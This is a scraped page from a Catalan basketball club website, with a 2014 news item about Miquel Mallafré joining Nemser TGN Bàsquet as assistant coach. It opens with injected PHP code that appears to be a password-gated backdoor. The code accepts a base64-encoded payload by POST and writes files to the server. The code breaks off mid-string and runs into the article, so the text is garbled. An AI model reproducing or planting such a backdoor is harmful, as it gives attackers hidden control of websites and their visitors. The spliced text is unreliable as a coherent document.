function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Miquel Mallafré, la mà dreta de Jordi Hernández al Nemser TGN Bàsquet - Tgn Bàsquet Club -

Miquel Mallafré, la mà dreta de Jordi Hernández al Nemser TGN Bàsquet

By
Updated: juliol 16, 2014

El Nemser TGN Bàsquet tindrà un equip tècnic de primera. Al fitxatge de Jordi Hernández com a màxim responsable de la banqueta lila, ara s’hi ha afegit Miquel Mallafré com a entrenador ajudant. Mallafré (7/12/1974) és un tècnic d’una reputació contrastada a les comarques tarragonines. Té 25 anys d’experiència a les banquetes i va començar a dirigir equips precisament al Sagrat Cor. Després va passar per tota una sèrie d’institucions fins que, arran de la seva marxa a Lleida per cursar els seus estudis d’INEF, va militar 6 temporades en el club de la Terra Ferma, sent, fins i tot, el delegat de l’equip d’ACB que va jugar la  copa ULEB (segona competició europea en importància rere l’Eurolliga). En la seva tornada a la demarcació de Tarragona, ha format part de diferents clubs de la ciutat i d’altres poblacions com Valls i Vila-seca i ara torna al club on va començar i del que va marxar el 1991.

“Jordi [Hernández] va ser ajudant meu quan jo era a Lleida entrenant equips de base i, per tant, ens coneixem de fa temps. Els dos som de Tarragona i tenim una bona relació d’amistat. Fa unes setmanes em va oferir ser el seu entrenador ajudant i jo vaig acceptar encantat”, diu Mallafré. El que serà segon entrenador del Nemser TGN Bàsquet no vol fer prediccions de com serà la temporada perquè considera que la categoria és imprevisible. “Primera catalana és molt variable. Pot canviar el nivell de joc dels equips de la categoria d’un any a un altre i, per tant, fins que no comencem la lliga no sabrem què ens trobarem”, diu mentre assegura que el seu paper serà el de “complementar la feina que l’entrenador fa en cada moment”.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *